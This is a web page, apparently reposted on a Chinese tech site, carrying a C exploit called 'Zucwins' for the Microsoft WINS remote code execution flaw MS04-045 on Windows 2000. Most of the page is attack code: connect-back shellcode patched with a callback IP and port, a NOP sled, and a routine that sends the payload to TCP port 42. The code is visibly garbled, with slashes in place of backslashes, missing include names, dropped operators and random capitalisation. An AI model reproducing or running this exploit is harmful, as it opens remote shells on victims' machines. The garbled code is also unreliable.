2. Tech
  3. Microsoft Wins Remote Code Execution Exploit (MS04-045)

Microsoft Wins Remote Code Execution Exploit (MS04-045)

xiaoxiao2021-03-06  40

Date: 31/12/2004

CAN-2004-1080

/ ************************************************** ************ /

/ * Zucwins 0.1 - Wins 2000 Remote Root Exploit * /

/ * EXPLOIT BY: ZUC * /

/ * Works on Windows 2000 SP3 / SP4 Probably Every Language * /

/ * SuccessFully Tested by K-Otik Security On Win2k English & French * /

/ ************************************************** ************ /

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

Char shellcode [] =

"/ XEB / X25 / XE9 / XFA / X99 / XD3 / X77 / XF6 / X02 / X06 / X6C / X59 / X6C / X59 / XF8"

"/ X1D / X9C / XDE / X8C / XD1 / X4C / X70 / XD4 / X03 / X58 / X46 / X57 / X53 / X32 / X5F"

"/ x33 / x32 / x2e / x44 / x4c / x4c / x01 / Xeb / x05 / XE8 / XF9 / XFF / XFF / XFF / X5D"

"/ X83 / XED / X2C / X6A / X30 / X59 / X64 / X8B / X01 / X8B / X40 / X0C / X8B / X70 / X1C"

"/ XAD / X8B / X78 / X08 / X8D / X5F / X3C / X8B / X1B / X01 / XFB / X8B / X5B / X78 / X01"

"/ xfb / x8b / x4b / x1c / x01 / x01 / x53 / x24 / x01 / xfa / x53 / x51 / x52 / x8b"

"/ x5b / x20 / x01 / x41 / x31 / xc0 / x99 / x8b / x34 / x8b / x01 / xfe"

"/ XAC / X31 / XC2 / XD1 / XE2 / X84 / XC0 / X75 / XF7 / X0F / XB6 / X45 / X09 / X8D / X44"

"/ x45 / x08 / x75 / x1 / x66 / x31 / x10 / x5a / x58 / x5e / x56 / x50"

"/ X52 / X2B / X4E / X10 / X41 / X0F / XB7 / X0C / X4A / X8B / X04 / X88 / X01 / XF8 / X0F"

"/ XB6 / X4D / X09 / X89 / XFE / X0D / X09 / X75 / XBE / XFE / X4D / X08" "/ X74 / X17 / XFE / X4D / X24 / X8D / X5D / X1A / X53 / XFF / XD0 / X89 / XC7 / X6A / X02 "

"/ x58 / x88 / x45 / x09 / x0c / x45 / x79 / x0c / Xeb / x82 / x50 / x8b / x45 / x04 / x35"

"/ x93 / x93 / x45 / x04 / x66 / x8b / x45 / x02 / x66 / x35 / x93 / x93"

"/ x66 / x89 / x45 / x02 / x58 / x89 / xce / x31 / xdb / x53 / x53 / x53 / x53 / x56 / x46"

"/ X56 / XFF / XD0 / X89 / XC7 / X55 / X58 / X66 / X89 / X30 / X6A / X10 / X55 / X57 / XFF"

"/ x55 / x88 / x50 / xff / x55 / xe8 / x55 / x55 / xff / x55 / XEC / X8D"

"/ x44 / x05 / x68 / x2e / x65 / x78 / x65 / x68 / x5c / x63 / x6d / x64"

"/ X94 / X31 / XD2 / X8D / X45 / XCC / X94 / X57 / X57 / X57 / X53 / X53 / XFE / XCA / X01"

"/ XF2 / X52 / X94 / X8D / X45 / X78 / X50 / X8D / X45 / X88 / X50 / XB1 / X08 / X53 / X53"

"/ X6A / X10 / XFE / XCE / X52 / X53 / X53 / X53 / X55 / XFF / X55 / XF0 / X6A / XFF / XFF"

"/ x55 / xe4";

Char mess [] =

"/ x00 / x03 / x77 / x4c / x77 / x05 / x4e / x00 / x3c / x01 / x02 / x03 / x04"

// "/ x00 / x03 / x77 / x4c / x77 / x05 / x4e / x00 / x3c / x01 / x02 / x03 / x04"

"/ X6C / X00 / X02 / X4E / X05 / X00 / X00 / X02 / X4E / X05 / X00 / X02 /

X02 / X02 / X05 / X00 / X00 / X02 / X02 / X05 / X00 / X02 / X4E / X05 "

Char rep [] =

"/ x05 / x01 / x00 / x4e / x05 / x90 / x00 / x4e / x05 / x90 / x00 / x4e / x05 / x90 / x00 /

X4E / X05 / X90 / X00 / X00 / X4E / X05 / X90 / X03 / X4E / X05 / X90 / X00 / X00 / X4E / X05 "

Void usage ();

Int main (int Argc, char * argv [])

{

INT I, SOCK, SOCK2, SOCK3, ADDR, LEN = 16;

Int rc;

Unsigned long xorip = 0x93939393;

UNSIGNED short xorport = 0x9393;

Int Cbport;

Long CBIP;

Struct sockaddr_in mytcp;

Struct hostent * hp;

IF (Argc <4 || Argc> 4)

USAGE ();

Cbport = HTONS (ATOI (Argv [3]));

CBIP = INET_ADDR (Argv [2]);

CBPORT = xorport;

CBIP = xorip;

Memcpy (& shellcode [2), & Cbport, 2); Memcpy (& shellcode [4], & CBIP, 4);

Char Mess2 [200000];

MEMSET (Mess2, 0, SizeOf (Mess2));

Char Mess3 [210000];

MEMSET (Mess3, 0, Sizeof (Mess3));

IN IR;

For (IR = 0; IR <200000; Ir ) Mess2 [IR] = '/ x90';

Memcpy (Mess3, Mess, SizeOf (Mess) -1);

INT R = 0; int L = SizeOf (Mess) -1;

For (r; r <30; r )

{

Memcpy (Mess3 Le, REP, SIZEOF (REP) -1);

Le = SizeOf (REP) -1;

}

Memcpy (Mess3 Le, Mess2, 200000);

Memcpy (Mess3 Le 198000, Shellcode, Sizeof (Shellcode);

INT LENR = Le 200000 Sizeof (shellcode);

HP = gethostbyname (Argv [1]);

AddR = inet_addr (argv [1]);

SOCK = Socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);

IF (! SOCK)

{

// Printf ("socket () error ... / n");

EXIT (-1);

}

Mytcp.sin_addr.s_addr = addr;

Mytcp.sin_family = af_INet;

Mytcp.sin_port = htons (42);

Printf ("[*] Connecting The Target / N");

RC = Connect (Sock, (Struct SockAddr *) & MyTCP, SIZEOF (Struct

SockAddr_in));

Printf ("[*] sending expedition / n");

Send (Sock, Mess3, Lenr, 0);

Printf ("[*] Exploit Sent / N");

Sleep (5);

Shutdown (SOCK, 1);

Close (SOCK);

Shutdown (SOCK, 2);

Close (SOCK2);

Shutdown (SOCK, 3);

Close (SOCK3);

exit (0);

}

Void usage ()

{

Unsigned int A;

Printf ("/ Nusage: / N");

Printf ("Sample: Zuc-Winshit www.vulnwins.com 31.33.7.23 31337 / N / N");

exit (0);

}

转载请注明原文地址:https://www.9cbs.com/read-74132.html

9cbs

New Post(0)